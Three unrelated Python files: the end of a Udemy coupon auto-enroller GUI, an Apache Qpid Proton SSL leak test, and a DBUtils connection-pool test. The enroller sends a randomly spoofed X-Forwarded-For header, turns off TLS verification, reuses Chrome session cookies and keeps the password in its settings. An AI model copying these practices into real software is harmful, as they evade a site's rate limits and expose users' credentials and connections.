                return "Email or password incorrect", "", "", ""
            else:
                return txt, "", "", ""
    return "Cloudflare is blocking your requests try again after an hour", "", "", ""
def check_login(client_id, access_token, csrf_token):
    """Validate the tokens against Udemy and build an authenticated session.

    Returns (headers, display_name, currency, session); raises if the
    context API response lacks the expected keys (i.e. tokens invalid).
    """
    spoofed_ip = ".".join(str(random.randint(0, 255)) for _ in range(4))
    head = {
        "authorization": "Bearer " + access_token,
        "accept": "application/json, text/plain, */*",
        "x-requested-with": "XMLHttpRequest",
        "x-forwarded-for": spoofed_ip,
        "x-udemy-authorization": "Bearer " + access_token,
        "content-type": "application/json;charset=UTF-8",
        "origin": "https://www.udemy.com",
        "referer": "https://www.udemy.com/",
        "dnt": "1",
    }
    context = requests.get(
        "https://www.udemy.com/api-2.0/contexts/me/?me=True&Config=True", headers=head
    ).json()
    currency = context["Config"]["price_country"]["currency"]
    user = context["me"]["display_name"]
    session = requests.session()
    session.cookies.update(cookiejar(client_id, access_token, csrf_token))
    session.headers.update(head)
    session.keep_alive = False
    return head, user, currency, session
def title_in_exclusion(title, t_x):
    """Return True when any word of `title` (case-insensitive) appears in t_x."""
    return any(word in t_x for word in title.casefold().split())
# -----------------
def free_checkout(coupon, courseid):
    """Submit a zero-amount coupon checkout for courseid.

    Uses the authenticated module-level session `s` and account `currency`.
    Returns the parsed JSON response.

    The original built the JSON payload by string concatenation, which
    produced invalid JSON for any coupon containing a quote or backslash;
    json.dumps escapes correctly and emits the same structure.
    """
    payload = json.dumps(
        {
            "checkout_environment": "Marketplace",
            "checkout_event": "Submit",
            "shopping_info": {
                "items": [
                    {
                        "discountInfo": {"code": coupon},
                        # courseid arrives as a digit string scraped from the
                        # page; the original emitted it unquoted (numeric)
                        "buyable": {"type": "course", "id": int(courseid), "context": {}},
                        "price": {"amount": 0, "currency": currency},
                    }
                ]
            },
            "payment_info": {
                "payment_vendor": "Free",
                "payment_method": "free-method",
            },
        }
    )
    r = s.post(
        "https://www.udemy.com/payment/checkout-submit/",
        data=payload,
        verify=False,
    )
    return r.json()
def free_enroll(courseid):
    """Enroll in a genuinely-free course via the subscribe endpoint.

    Uses the authenticated module-level session `s`; returns the
    subscribed-course JSON from the follow-up query.
    """
    cid = str(courseid)
    s.get(
        "https://www.udemy.com/course/subscribe/?courseId=" + cid,
        verify=False,
    )
    response = s.get(
        "https://www.udemy.com/api-2.0/users/me/subscribed-courses/"
        + cid
        + "/?fields%5Bcourse%5D=%40default%2Cbuyable_object_type%2Cprimary_subcategory%2Cis_private",
        verify=False,
    )
    return response.json()
# -----------------
def auto(list_st):
    """Enroll in every "title|:|link" entry of list_st, driving the GUI.

    Applies the user's instructor/title/category/language/rating filters,
    then either checks out with the coupon or free-subscribes.  Tallies
    success / already-enrolled / expired / excluded counts and, when
    enabled, appends each enrolled combo to a dated file under Courses/.
    """
    main_window["pout"].update(0, max=len(list_st))
    # counters: success, already-enrolled, expired, excluded, amount saved
    se_c, ae_c, e_c, ex_c, as_c = 0, 0, 0, 0, 0
    if settings["save_txt"]:
        if not os.path.exists("Courses/"):
            os.makedirs("Courses/")
        txt_file = open(f"Courses/" + time.strftime("%Y-%m-%d--%H-%M"), "w")
    for index, combo in enumerate(list_st):
        tl = combo.split("|:|")
        main_window["out"].print(str(index) + " " + tl[0], text_color="yellow", end=" ")
        link = tl[1]
        main_window["out"].print(link, text_color="blue")
        try:
            course_id = get_course_id(link)
            if course_id:
                coupon_id = get_course_coupon(link)
                cat, lang, avg_rating, instructor = affiliate_api(course_id)
                purchased, amount = course_landing_api(course_id)
                # apply the user's filters before attempting enrollment
                if (
                    instructor in instructor_exclude
                    or title_in_exclusion(tl[0], title_exclude)
                    or cat not in categories
                    or lang not in languages
                    or avg_rating < min_rating
                ):
                    if instructor in instructor_exclude:
                        main_window["out"].print(
                            f"Instructor excluded: {instructor}", text_color="light blue"
                        )
                    elif title_in_exclusion(tl[0], title_exclude):
                        main_window["out"].print("Title Excluded", text_color="light blue")
                    elif cat not in categories:
                        main_window["out"].print(
                            f"Category excluded: {cat}", text_color="light blue"
                        )
                    elif lang not in languages:
                        main_window["out"].print(
                            f"Languages excluded: {lang}", text_color="light blue"
                        )
                    elif avg_rating < min_rating:
                        main_window["out"].print(
                            f"Poor rating: {avg_rating}", text_color="light blue"
                        )
                    main_window["out"].print()
                    ex_c += 1
                else:
                    if not purchased:
                        if coupon_id:
                            # coupon checkout path
                            slp = ""
                            js = free_checkout(coupon_id, course_id)
                            try:
                                if js["status"] == "succeeded":
                                    main_window["out"].print(
                                        "Successfully Enrolled To Course :)",
                                        text_color="green",
                                    )
                                    main_window["out"].print()
                                    se_c += 1
                                    as_c += amount
                                    if settings["save_txt"]:
                                        txt_file.write(combo + "\n")
                                        txt_file.flush()
                                        os.fsync(txt_file.fileno())
                                elif js["status"] == "failed":
                                    # print(js)
                                    main_window["out"].print(
                                        "Coupon Expired :(", text_color="red"
                                    )
                                    main_window["out"].print()
                                    e_c += 1
                            except:
                                # no "status" key: either a rate-limit
                                # "detail" message carrying a retry delay,
                                # or an otherwise-dead coupon
                                try:
                                    msg = js["detail"]
                                    main_window["out"].print(
                                        f"{msg}", text_color="dark blue"
                                    )
                                    main_window["out"].print()
                                    print(js)
                                    # first number in the message is the
                                    # suggested wait in seconds
                                    slp = int(re.search(r"\d+", msg).group(0))
                                except:
                                    # print(js)
                                    main_window["out"].print(
                                        "Expired Coupon", text_color="red"
                                    )
                                    main_window["out"].print()
                                    e_c += 1
                                if slp != "":
                                    slp += 5
                                    main_window["out"].print(
                                        ">>> Pausing execution of script for "
                                        + str(slp)
                                        + " seconds",
                                        text_color="red",
                                    )
                                    time.sleep(slp)
                                    main_window["out"].print()
                                else:
                                    time.sleep(3.5)
                        elif not coupon_id:
                            # free (no-coupon) course path
                            if settings["discounted_only"]:
                                main_window["out"].print(
                                    "Free course excluded", text_color="light blue"
                                )
                                ex_c += 1
                                continue
                            js = free_enroll(course_id)
                            try:
                                if js["_class"] == "course":
                                    main_window["out"].print(
                                        "Successfully Subscribed", text_color="green"
                                    )
                                    main_window["out"].print()
                                    se_c += 1
                                    as_c += amount
                                    if settings["save_txt"]:
                                        txt_file.write(combo + "\n")
                                        txt_file.flush()
                                        os.fsync(txt_file.fileno())
                            except:
                                main_window["out"].print(
                                    "COUPON MIGHT HAVE EXPIRED", text_color="red"
                                )
                                main_window["out"].print()
                                e_c += 1
                    elif purchased:
                        # purchase_date string is shown directly
                        main_window["out"].print(purchased, text_color="light blue")
                        main_window["out"].print()
                        ae_c += 1
            elif not course_id:
                main_window["out"].print(".Course Expired.", text_color="red")
                e_c += 1
            main_window["pout"].update(index + 1)
        except:
            # keep going on any per-course failure; log to console only
            e = traceback.format_exc()
            print(e)
    # show the final stats panel
    main_window["done_col"].update(visible=True)
    main_window["se_c"].update(value=f"Successfully Enrolled: {se_c}")
    main_window["as_c"].update(value=f"Amount Saved: ${round(as_c,2)}")
    main_window["ae_c"].update(value=f"Already Enrolled: {ae_c}")
    main_window["e_c"].update(value=f"Expired Courses: {e_c}")
    main_window["ex_c"].update(value=f"Excluded Courses: {ex_c}")
##########################################
def main1():
    """Worker thread: run the selected scrapers, then enroll on the results.

    Drives the GUI columns through the scrape → output phases; any failure
    is shown in a scrollable popup.
    """
    try:
        links_ls = []
        for key in funcs:
            main_window[f"pcol{key}"].update(visible=True)
        main_window["main_col"].update(visible=False)
        main_window["scrape_col"].update(visible=True)
        for key in funcs:
            funcs[key].start()
        for t in funcs:
            funcs[t].join()
        main_window["scrape_col"].update(visible=False)
        main_window["output_col"].update(visible=True)
        # Collect whichever per-site result lists the scrapers populated.
        # globals().get replaces the original eval() — same lookup, no
        # dynamic code execution, and missing lists just contribute [].
        for link_list in (
            "du_links",
            "uf_links",
            "tb_links",
            "rd_links",
            "cv_links",
            "idc_links",
            "en_links",
        ):
            links_ls += globals().get(link_list, [])
        auto(remove_duplicates(links_ls))
    except Exception:
        # was a bare `except:`; Exception still reports every real failure
        e = traceback.format_exc()
        sg.popup_scrolled(e, title=f"Unknown Error {version}")
        main_window["output_col"].Update(visible=False)
# Load persisted settings and compute the window titles (this also checks
# GitHub for a newer release).
settings, instructor_exclude, title_exclude = load_settings()
login_title, main_title = update_available()
############## MAIN ############# MAIN############## MAIN ############# MAIN ############## MAIN ############# MAIN ###########
menu = [["Help", ["Support", "Github", "Discord"]]]
login_error = False
# Attempt a silent login with whatever was persisted: browser cookies
# ("auto") or the saved email/password ("manual").  Any failure falls
# through to the interactive login window below.
try:
    if settings["stay_logged_in"]["auto"]:
        my_cookies, cookies = fetch_cookies()
        head, user, currency, s = check_login(
            my_cookies["client_id"], my_cookies["access_token"], my_cookies["csrftoken"]
        )
    elif settings["stay_logged_in"]["manual"]:
        txt, client_id, access_token, csrf_token = manual_login()
        if not txt:
            head, user, currency, s = check_login(client_id, access_token, csrf_token)
except:
    login_error = True
# Show the login window when no silent login was configured or it failed.
if (
    not settings["stay_logged_in"]["auto"] and not settings["stay_logged_in"]["manual"]
) or login_error:
    # col1: choose between auto (browser cookies) and manual login
    c1 = [
        [
            sg.Button(key="a_login", image_data=auto_login),
            sg.T(""),
            sg.B(key="m_login", image_data=manual_login_),
        ],
        [
            sg.Checkbox(
                "Stay logged-in",
                default=settings["stay_logged_in"]["auto"],
                key="sli_a",
            )
        ],
    ]
    # col2: email/password form for manual login
    c2 = [
        [
            sg.T("Email"),
            sg.InputText(
                default_text=settings["email"], key="email", size=(20, 1), pad=(5, 5)
            ),
        ],
        [
            sg.T("Password"),
            sg.InputText(
                default_text=settings["password"],
                key="password",
                size=(20, 1),
                pad=(5, 5),
                password_char="*",
            ),
        ],
        [
            sg.Checkbox(
                "Stay logged-in",
                default=settings["stay_logged_in"]["manual"],
                key="sli_m",
            )
        ],
        [
            sg.B(key="Back", image_data=back),
            sg.T(" "),
            sg.B(key="Login", image_data=login),
        ],
    ]
    login_layout = [
        [sg.Menu(menu)],
        [sg.Column(c1, key="col1"), sg.Column(c2, visible=False, key="col2")],
    ]
    login_window = sg.Window(login_title, login_layout)
    # Login event loop: exits via break on success or sys.exit on close.
    while True:
        event, values = login_window.read()
        if event in (None,):
            login_window.close()
            sys.exit()
        elif event == "a_login":
            try:
                my_cookies, cookies = fetch_cookies()
                try:
                    head, user, currency, s = check_login(
                        my_cookies["client_id"],
                        my_cookies["access_token"],
                        my_cookies["csrftoken"],
                    )
                    settings["stay_logged_in"]["auto"] = values["sli_a"]
                    save_settings()
                    login_window.close()
                    break
                except Exception as e:
                    # cookies fetched but rejected by Udemy
                    sg.popup_auto_close(
                        "Make sure you are logged in to udemy.com in chrome browser",
                        title="Error",
                        auto_close_duration=5,
                        no_titlebar=True,
                    )
            except Exception as e:
                e = traceback.format_exc()
                sg.popup_scrolled(e, title=f"Unknown Error {version}")
        elif event == "m_login":
            # switch to the email/password column
            login_window["col1"].update(visible=False)
            login_window["col2"].update(visible=True)
            login_window["email"].update(value=settings["email"])
            login_window["password"].update(value=settings["password"])
        elif event == "Github":
            web("https://github.com/techtanic/Discounted-Udemy-Course-Enroller")
        elif event == "Support":
            web("https://techtanic.github.io/duce/")
        elif event == "Discord":
            web("https://discord.gg/wFsfhJh4Rh")
        elif event == "Back":
            login_window["col1"].update(visible=True)
            login_window["col2"].update(visible=False)
        elif event == "Login":
            settings["email"] = values["email"]
            settings["password"] = values["password"]
            try:
                txt, client_id, access_token, csrf_token = manual_login()
                if not txt:
                    head, user, currency, s = check_login(
                        client_id, access_token, csrf_token
                    )
                    settings["stay_logged_in"]["manual"] = values["sli_m"]
                    save_settings()
                    login_window.close()
                    break
                else:
                    # txt carries manual_login's error message
                    sg.popup_auto_close(
                        txt,
                        title="Error",
                        auto_close_duration=5,
                        no_titlebar=True,
                    )
            except:
                e = traceback.format_exc()
                sg.popup_scrolled(e, title=f"Unknown Error {version}")
# ---- Main-window layout construction --------------------------------------
# One checkbox per coupon site.
checkbox_lo = []
for key in settings["sites"]:
    checkbox_lo.append([sg.Checkbox(key, key=key, default=settings["sites"][key])])
# Category checkboxes, laid out three per row.
categories_lo = []
categories_k = list(settings["categories"].keys())
categories_v = list(settings["categories"].values())
for index, _ in enumerate(settings["categories"]):
    if index % 3 == 0:
        try:
            categories_lo.append(
                [
                    sg.Checkbox(
                        categories_k[index],
                        default=categories_v[index],
                        key=categories_k[index],
                        size=(16, 1),
                    ),
                    sg.Checkbox(
                        categories_k[index + 1],
                        default=categories_v[index + 1],
                        key=categories_k[index + 1],
                        size=(16, 1),
                    ),
                    sg.Checkbox(
                        categories_k[index + 2],
                        default=categories_v[index + 2],
                        key=categories_k[index + 2],
                        size=(15, 1),
                    ),
                ]
            )
        except:
            # fewer than three categories left: fall back to a single box.
            # NOTE(review): when exactly two remain, the second is dropped —
            # compare the languages loop below, which handles the two-left
            # case explicitly.
            categories_lo.append(
                [
                    sg.Checkbox(
                        categories_k[index],
                        default=categories_v[index],
                        key=categories_k[index],
                        size=(17, 1),
                    )
                ]
            )
# Language checkboxes, three per row with a two-per-row fallback.
languages_lo = []
languages_k = list(settings["languages"].keys())
languages_v = list(settings["languages"].values())
for index, _ in enumerate(settings["languages"]):
    if index % 3 == 0:
        try:
            languages_lo.append(
                [
                    sg.Checkbox(
                        languages_k[index],
                        default=languages_v[index],
                        key=languages_k[index],
                        size=(8, 1),
                    ),
                    sg.Checkbox(
                        languages_k[index + 1],
                        default=languages_v[index + 1],
                        key=languages_k[index + 1],
                        size=(8, 1),
                    ),
                    sg.Checkbox(
                        languages_k[index + 2],
                        default=languages_v[index + 2],
                        key=languages_k[index + 2],
                        size=(8, 1),
                    ),
                ]
            )
        except IndexError:
            # two languages left on the final row
            languages_lo.append(
                [
                    sg.Checkbox(
                        languages_k[index],
                        default=languages_v[index],
                        key=languages_k[index],
                        size=(8, 1),
                    ),
                    sg.Checkbox(
                        languages_k[index + 1],
                        default=languages_v[index + 1],
                        key=languages_k[index + 1],
                        size=(8, 1),
                    ),
                ]
            )
# "Main" tab: site + language + category filters.
main_tab = [
    [
        sg.Frame(
            "Websites",
            checkbox_lo,
            "#4deeea",
            border_width=4,
            title_location="n",
            key="fcb",
        ),
        sg.Frame(
            "Language",
            languages_lo,
            "#4deeea",
            border_width=4,
            title_location="n",
            key="fl",
        ),
    ],
    [
        sg.Frame(
            "Category",
            categories_lo,
            "#4deeea",
            border_width=4,
            title_location="n",
            key="fc",
        )
    ],
]
# "Advanced" tab widgets: exclusions, minimum rating, misc toggles.
instructor_ex_lo = [
    [
        sg.Multiline(
            default_text=instructor_exclude, key="instructor_exclude", size=(15, 10)
        )
    ],
    [sg.Text("Paste instructor(s)\nusername in new lines")],
]
title_ex_lo = [
    [sg.Multiline(default_text=title_exclude, key="title_exclude", size=(20, 10))],
    [sg.Text("Keywords in new lines\nNot cAsE sensitive")],
]
rating_lo = [
    [
        sg.Spin(
            [0.0, 0.5, 1.0, 1.5, 2.0, 2.5, 3.0, 3.5, 4.0, 4.5, 5.0],
            initial_value=settings["min_rating"],
            key="min_rating",
            font=25,
        ),
        sg.Text("0.0 <-> 5.0", font=15),
    ]
]
advanced_tab = [
    [
        sg.Frame(
            "Exclude Instructor",
            instructor_ex_lo,
            "#4deeea",
            border_width=4,
            title_location="n",
            font=25,
        ),
        sg.Frame(
            "Title Keyword Exclusion",
            title_ex_lo,
            "#4deeea",
            border_width=4,
            title_location="n",
            font=25,
        ),
    ],
    [
        sg.Frame(
            "Minimum Rating",
            rating_lo,
            "#4deeea",
            border_width=4,
            title_location="n",
            key="f_min_rating",
            font=25,
        )
    ],
    [
        sg.Checkbox(
            "Save enrolled courses in txt", key="save_txt", default=settings["save_txt"]
        )
    ],
    [
        sg.Checkbox(
            "Enroll in Discounted courses only",
            key="discounted_only",
            default=settings["discounted_only"],
        )
    ],
]
# One hidden progress row per site; revealed while its scraper runs.
scrape_col = []
for key in settings["sites"]:
    scrape_col.append(
        [
            sg.pin(
                sg.Column(
                    [
                        [
                            sg.Text(key, size=(12, 1)),
                            sg.ProgressBar(
                                3,
                                orientation="h",
                                key=f"p{key}",
                                bar_color=("#1c6fba", "#000000"),
                                border_width=1,
                                size=(20, 20),
                            ),
                            sg.Image(data=check_mark, visible=False, key=f"i{key}"),
                        ]
                    ],
                    key=f"pcol{key}",
                    visible=False,
                )
            )
        ]
    )
# Scrolling output pane plus overall progress bar, shown while enrolling.
output_col = [
    [sg.Text("Output")],
    [sg.Multiline(size=(69, 12), key="out", autoscroll=True, disabled=True)],
    [
        sg.ProgressBar(
            3,
            orientation="h",
            key="pout",
            bar_color=("#1c6fba", "#000000"),
            border_width=1,
            size=(46, 20),
        )
    ],
]
# Final statistics panel; values filled in by auto().
done_col = [
    [sg.Text(" Stats", text_color="#FFD700")],
    [
        sg.Text(
            "Successfully Enrolled: ",
            key="se_c",
            text_color="#7CFC00",
        )
    ],
    [
        sg.Text(
            "Amount Saved: $ ",
            key="as_c",
            text_color="#00FA9A",
        )
    ],
    [sg.Text("Already Enrolled: ", key="ae_c", text_color="#00FFFF")],
    [sg.Text("Expired Courses: ", key="e_c", text_color="#FF0000")],
    [sg.Text("Excluded Courses: ", key="ex_c", text_color="#FF4500")],
]
main_col = [
    [
        sg.TabGroup(
            [[sg.Tab("Main", main_tab), sg.Tab("Advanced", advanced_tab)]],
            border_width=2,
            font=25,
        )
    ],
    [
        sg.Button(
            key="Start",
            tooltip="Once started will not stop until completed",
            image_data=start,
        )
    ],
]
# The logout button is hidden unless some stay-logged-in mode is active.
if settings["stay_logged_in"]["auto"] or settings["stay_logged_in"]["manual"]:
    logout_btn_lo = sg.Button(key="Logout", image_data=logout)
else:
    logout_btn_lo = sg.Button(key="Logout", image_data=logout, visible=False)
main_lo = [
    [
        sg.Menu(
            menu,
            key="mn",
        )
    ],
    [sg.Text(f"Logged in as: {user}", key="user_t"), logout_btn_lo],
    [
        sg.pin(sg.Column(main_col, key="main_col")),
        sg.pin(sg.Column(output_col, key="output_col", visible=False)),
        sg.pin(sg.Column(scrape_col, key="scrape_col", visible=False)),
        sg.pin(sg.Column(done_col, key="done_col", visible=False)),
    ],
    [sg.Button(key="Exit", image_data=exit_)],
]
# ,sg.Button(key='Dummy',image_data=back)
# ---- Main window & event loop ---------------------------------------------
global main_window  # NOTE(review): `global` has no effect at module scope
main_window = sg.Window(main_title, main_lo, finalize=True)
# background thread keeps the enrolled-course count in the menu fresh
threading.Thread(target=update_courses, daemon=True).start()
update_available()  # NOTE(review): return value is discarded here
while True:
    event, values = main_window.read()
    if event == "Dummy":
        print(values)
    if event in (None, "Exit"):
        break
    elif event == "Logout":
        # forget both stay-logged-in modes and restart fresh next launch
        settings["stay_logged_in"]["auto"], settings["stay_logged_in"]["manual"] = (
            False,
            False,
        )
        save_settings()
        break
    elif event == "Support":
        web("https://techtanic.github.io/duce/support/#")
    elif event == "Github":
        web("https://github.com/techtanic/Discounted-Udemy-Course-Enroller")
    elif event == "Discord":
        web("https://discord.gg/wFsfhJh4Rh")
    elif event == "Start":
        # persist every filter choice from the form before scraping
        for key in settings["languages"]:
            settings["languages"][key] = values[key]
        for key in settings["categories"]:
            settings["categories"][key] = values[key]
        for key in settings["sites"]:
            settings["sites"][key] = values[key]
        settings["instructor_exclude"] = values["instructor_exclude"].split()
        settings["title_exclude"] = list(
            filter(None, values["title_exclude"].split("\n"))
        )
        settings["min_rating"] = float(values["min_rating"])
        settings["save_txt"] = values["save_txt"]
        settings["discounted_only"] = values["discounted_only"]
        save_settings()
        all_functions = create_scrape_obj()
        # module-level state consumed by main1()/auto() on the worker thread
        funcs = {}
        sites = {}
        categories = []
        languages = []
        instructor_exclude = settings["instructor_exclude"]
        title_exclude = settings["title_exclude"]
        min_rating = settings["min_rating"]
        user_dumb = True  # stays True when no site is selected
        for key in settings["sites"]:
            if values[key]:
                funcs[key] = all_functions[key]
                sites[key] = settings["sites"][key]
                user_dumb = False
        for key in settings["categories"]:
            if values[key]:
                categories.append(key)
        for key in settings["languages"]:
            if values[key]:
                languages.append(key)
        if user_dumb:
            sg.popup_auto_close(
                "What do you even expect to happen!",
                auto_close_duration=5,
                no_titlebar=True,
            )
        if not user_dumb:
            # for key in all_functions:
            #     main_window[f"p{key}"].update(0, visible=True)
            #     main_window[f"img{index}"].update(visible=False)
            #     main_window[f"pcol{index}"].update(visible=False)
            threading.Thread(target=main1, daemon=True).start()
main_window.close()
|
test_PROTON_2111_container_ssl_ssldomain_object_leak.py | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License
#
"""
PROTON-2111 python: memory leak on Container, SSL, and SSLDomain objects
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
import gc
import os
import platform
import socket
import threading
import unittest
import cproton
import proton.handlers
import proton.utils
import proton.reactor
class Broker(proton.handlers.MessagingHandler):
    """Minimal in-process AMQP broker used as a test fixture.

    Listens on ``acceptor_url`` (optionally with SSL) and exposes two
    threading.Events: one set when the acceptor is open, one set when a
    message has been received.
    """

    def __init__(self, acceptor_url, ssl_domain=None):
        # type: (str, proton.SSLDomain) -> None
        super(Broker, self).__init__()
        self.acceptor_url = acceptor_url
        self.ssl_domain = ssl_domain
        self.acceptor = None
        # set by on_start() once the acceptor is listening
        self._acceptor_opened_event = threading.Event()
        # set by on_message() when the broker receives a message
        self.on_message_ = threading.Event()

    def get_acceptor_sockname(self):
        # type: () -> (str, int)
        """Return the (host, port) the acceptor is actually bound to.

        Blocks until ``on_start`` has opened the acceptor.
        """
        self._acceptor_opened_event.wait()
        if hasattr(self.acceptor, '_selectable'):  # proton 0.30.0+
            sockname = self.acceptor._selectable._delegate.getsockname()
        else:  # works in proton 0.27.0
            selectable = cproton.pn_cast_pn_selectable(self.acceptor._impl)
            fd = cproton.pn_selectable_get_fd(selectable)
            # socket.fromfd() dup()s the fd; close the duplicate socket so
            # we do not leak one file descriptor per call (the original
            # code never closed it).
            s = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
            try:
                sockname = s.getsockname()
            finally:
                s.close()
        return sockname[:2]

    def on_start(self, event):
        self.acceptor = event.container.listen(self.acceptor_url, ssl_domain=self.ssl_domain)
        self._acceptor_opened_event.set()

    def on_link_opening(self, event):
        link = event.link  # type: proton.Link
        if link.is_sender:
            assert not link.remote_source.dynamic, "This cannot happen"
            link.source.address = link.remote_source.address
        elif link.remote_target.address:
            link.target.address = link.remote_target.address

    def on_message(self, event):
        self.on_message_.set()
@contextlib.contextmanager
def test_broker(ssl_domain=None):
    # type: (proton.SSLDomain) -> Broker
    """Context manager yielding a running Broker on an ephemeral port.

    The container runs in a background thread.  Shutdown is performed in a
    ``finally`` block so that the reactor thread is stopped and joined even
    when the ``with`` body raises — the original version skipped cleanup on
    exception, leaking the thread and the acceptor.
    """
    broker = Broker('localhost:0', ssl_domain=ssl_domain)
    container = proton.reactor.Container(broker)
    t = threading.Thread(target=container.run)
    t.start()
    try:
        yield broker
    finally:
        container.stop()
        if broker.acceptor:
            broker.acceptor.close()
        t.join()
class SampleSender(proton.handlers.MessagingHandler):
    """Client handler: connect over SSL, send one test message, disconnect."""

    def __init__(self, msg_id, urls, ssl_domain=None, *args, **kwargs):
        # type: (str, str, proton.SSLDomain, *object, **object) -> None
        super(SampleSender, self).__init__(*args, **kwargs)
        self.urls = urls
        self.msg_id = msg_id
        self.ssl_domain = ssl_domain

    def on_start(self, event):
        # type: (proton.Event) -> None
        # One connection, no reconnect attempts; a sender link is attached
        # to it immediately.
        connection = event.container.connect(
            url=self.urls, reconnect=False, ssl_domain=self.ssl_domain)
        event.container.create_sender(connection, target='topic://VirtualTopic.event')

    def on_sendable(self, event):
        # Send a single message, then tear the link and connection down.
        payload = {'msg-id': self.msg_id, 'name': 'python'}
        event.sender.send(proton.Message(body=payload))
        event.sender.close()
        event.connection.close()

    def on_connection_error(self, event):
        print("on_error", event)
class Proton2111Test(unittest.TestCase):
    """Regression test for PROTON-2111: memory leak on Container, SSL and
    SSLDomain objects."""

    @unittest.skipIf(platform.system() == 'Windows', "TODO jdanek: Test is broken on Windows")
    def test_send_message_ssl_no_object_leaks(self):
        """Starts a broker with ssl acceptor, in a loop connects to it and sends message.
        The test checks that number of Python objects is not increasing inside the loop.
        """
        # Test certificates are loaded from a 'certificates' directory next
        # to this test module.
        cwd = os.path.dirname(__file__)
        cert_file = os.path.join(cwd, 'certificates', 'localhost_ca1.pem')
        key_file = os.path.join(cwd, 'certificates', 'localhost_ca1-key.pem')
        certificate_db = os.path.join(cwd, 'certificates', 'ca1.pem')
        password = None  # no password is supplied for the test key
        # Server side: present the localhost certificate.
        broker_ssl_domain = proton.SSLDomain(proton.SSLDomain.MODE_SERVER)
        broker_ssl_domain.set_credentials(cert_file, key_file, password=password)
        # Client side: trust the test CA and verify the server's certificate.
        client_ssl_domain = proton.SSLDomain(proton.SSLDomain.MODE_CLIENT)
        client_ssl_domain.set_trusted_ca_db(certificate_db)
        client_ssl_domain.set_peer_authentication(proton.SSLDomain.VERIFY_PEER)

        def send_msg(msg_id, urls):
            # Each iteration constructs a fresh Container (one of the object
            # types whose leak is under test) and runs it to completion.
            container = proton.reactor.Container(SampleSender(msg_id, urls, client_ssl_domain))
            container.run()

        with test_broker(ssl_domain=broker_ssl_domain) as broker:
            urls = "amqps://{0}:{1}".format(*broker.get_acceptor_sockname())
            gc.collect()
            object_counts = []
            for i in range(300):
                send_msg(i + 1, urls)
                broker.on_message_.wait()  # message got through
                broker.on_message_.clear()
                # Count all live objects after a full collection.
                gc.collect()
                object_counts.append(len(gc.get_objects()))
        # drop first few values, it is usually different (before counts settle)
        object_counts = object_counts[2:]
        diffs = [c - object_counts[0] for c in object_counts]
        for diff in diffs:
            # allow for random variation from initial value on some systems, but prohibit linear growth
            self.assertTrue(diff <= 50, "Object counts should not be increasing: {0}".format(diffs))
|
TestPooledPg.py | """Test the PooledPg module.
Note:
We don't test performance here, so the test does not predicate
whether PooledPg actually will help in improving performance or not.
We also assume that the underlying SteadyPg connections are tested.
Copyright and credit info:
* This test was contributed by Christoph Zwerschke
"""
__version__ = '1.0'
__revision__ = "$Rev: 7680 $"
__date__ = "$Date$"
import sys
import unittest
sys.path.insert(1, '../..')
# The TestSteadyPg module serves as a mock object for the pg API module:
from DBUtils.Testing import TestSteadyPg
from DBUtils.PooledPg import PooledPg
class TestPooledPg(unittest.TestCase):
    """Unit tests for the classic PooledPg connection pool.

    Fix applied: ``Thread.isAlive()`` was replaced with ``Thread.is_alive()``
    — the camelCase alias was removed in Python 3.9, while ``is_alive()``
    has existed since Python 2.6, so the change is backward-compatible.
    (``self.assert_`` is kept for consistency with the rest of this legacy
    suite, which still targets Python 2 — note the ``Queue`` import below.)
    """

    def test0_CheckVersion(self):
        """Module, class and package version strings must all agree."""
        from DBUtils import __version__ as DBUtilsVersion
        self.assertEqual(DBUtilsVersion, __version__)
        from DBUtils.PooledPg import __version__ as PooledPgVersion
        self.assertEqual(PooledPgVersion, __version__)
        self.assertEqual(PooledPg.version, __version__)

    def test1_CreateConnection(self):
        """A new pool prefills its cache and hands out working connections."""
        pool = PooledPg(1, 1, 0, False, None, None,
            'PooledPgTestDB', user='PooledPgTestUser')
        self.assert_(hasattr(pool, '_cache'))
        self.assertEqual(pool._cache.qsize(), 1)
        self.assert_(hasattr(pool, '_maxusage'))
        self.assertEqual(pool._maxusage, None)
        self.assert_(hasattr(pool, '_setsession'))
        self.assert_(pool._setsession is None)
        db_con = pool._cache.get(0)
        pool._cache.put(db_con, 0)
        from DBUtils.SteadyPg import SteadyPgConnection
        self.assert_(isinstance(db_con, SteadyPgConnection))
        db = pool.connection()
        self.assertEqual(pool._cache.qsize(), 0)
        self.assert_(hasattr(db, '_con'))
        self.assertEqual(db._con, db_con)
        self.assert_(hasattr(db, 'query'))
        self.assert_(hasattr(db, 'num_queries'))
        self.assertEqual(db.num_queries, 0)
        self.assert_(hasattr(db, '_maxusage'))
        self.assertEqual(db._maxusage, 0)
        self.assert_(hasattr(db, '_setsession_sql'))
        self.assert_(db._setsession_sql is None)
        self.assert_(hasattr(db, 'dbname'))
        self.assertEqual(db.dbname, 'PooledPgTestDB')
        self.assert_(hasattr(db, 'user'))
        self.assertEqual(db.user, 'PooledPgTestUser')
        db.query('select test')
        self.assertEqual(db.num_queries, 1)
        pool = PooledPg(1)
        db = pool.connection()
        self.assert_(hasattr(db, 'dbname'))
        self.assert_(db.dbname is None)
        self.assert_(hasattr(db, 'user'))
        self.assert_(db.user is None)
        self.assert_(hasattr(db, 'num_queries'))
        self.assertEqual(db.num_queries, 0)
        pool = PooledPg(0, 0, 0, False, 3, ('set datestyle',),)
        self.assertEqual(pool._maxusage, 3)
        self.assertEqual(pool._setsession, ('set datestyle',))
        db = pool.connection()
        self.assertEqual(db._maxusage, 3)
        self.assertEqual(db._setsession_sql, ('set datestyle',))

    def test2_CloseConnection(self):
        """Closing a pooled connection returns it to the cache intact."""
        pool = PooledPg(0, 1, 0, False, None, None,
            'PooledPgTestDB', user='PooledPgTestUser')
        db = pool.connection()
        self.assert_(hasattr(db, '_con'))
        db_con = db._con
        from DBUtils.SteadyPg import SteadyPgConnection
        self.assert_(isinstance(db_con, SteadyPgConnection))
        self.assert_(hasattr(pool, '_cache'))
